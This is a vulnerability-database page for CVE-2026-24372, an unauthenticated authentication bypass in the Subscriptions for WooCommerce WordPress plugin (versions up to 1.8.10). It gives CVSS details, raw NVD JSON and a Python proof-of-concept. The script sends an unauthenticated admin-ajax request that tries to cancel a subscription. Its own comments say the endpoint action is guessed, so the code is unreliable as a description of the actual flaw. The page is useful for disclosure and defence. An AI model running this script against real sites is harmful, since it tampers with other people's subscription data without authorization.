Security Vulnerability Report
中文
CVE-2026-24372 CVSS 7.5 HIGH

CVE-2026-24372

Published: 2026-03-25 17:16:38
Last Modified: 2026-04-29 10:16:54

Description

Authentication Bypass by Spoofing vulnerability in WP Swings Subscriptions for WooCommerce subscriptions-for-woocommerce allows Input Data Manipulation.This issue affects Subscriptions for WooCommerce: from n/a through <= 1.8.10.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Subscriptions for WooCommerce <= 1.8.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # POC for Authentication Bypass / Input Data Manipulation # Target: Subscriptions for WooCommerce <= 1.8.10 def check_vulnerability(target_url): # The vulnerable endpoint might be an AJAX action or a specific REST API route # Example endpoint (needs to be adjusted based on actual plugin routes) exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload attempting to manipulate subscription data without authentication # 'action' parameter triggers the vulnerable function # 'subscription_id' is the target to manipulate payload = { "action": "wps_subscriptions_update_subscription", "subscription_id": "1", "status": "cancelled", # Attempting to cancel subscription # Note: No valid nonce, cookie, or authentication token is provided } headers = { "User-Agent": "Mozilla/5.0 (Vulnerability Scanner)", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(exploit_url, data=payload, headers=headers, timeout=10) # Check if the manipulation was successful (e.g., status 200 and specific content) if response.status_code == 200: print("[+] Request sent successfully. Check if subscription status changed.") print(f"[+] Response: {response.text[:200]}") else: print("[-] Exploit failed or target is not vulnerable.") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://example.com" check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24372", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:37.660", "lastModified": "2026-04-29T10:16:53.517", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass by Spoofing vulnerability in WP Swings Subscriptions for WooCommerce subscriptions-for-woocommerce allows Input Data Manipulation.This issue affects Subscriptions for WooCommerce: from n/a through <= 1.8.10."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autenticación por suplantación en WP Swings Subscriptions for WooCommerce subscriptions-for-woocommerce permite la manipulación de datos de entrada. Este problema afecta a Subscriptions for WooCommerce: desde n/a hasta &lt;= 1.8.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/subscriptions-for-woocommerce/vulnerability/wordpress-subscriptions-for-woocommerce-plugin-1-8-10-bypass-vulnerability-vulnerability?_s_id=cve", "source": "[email protected]"}]}}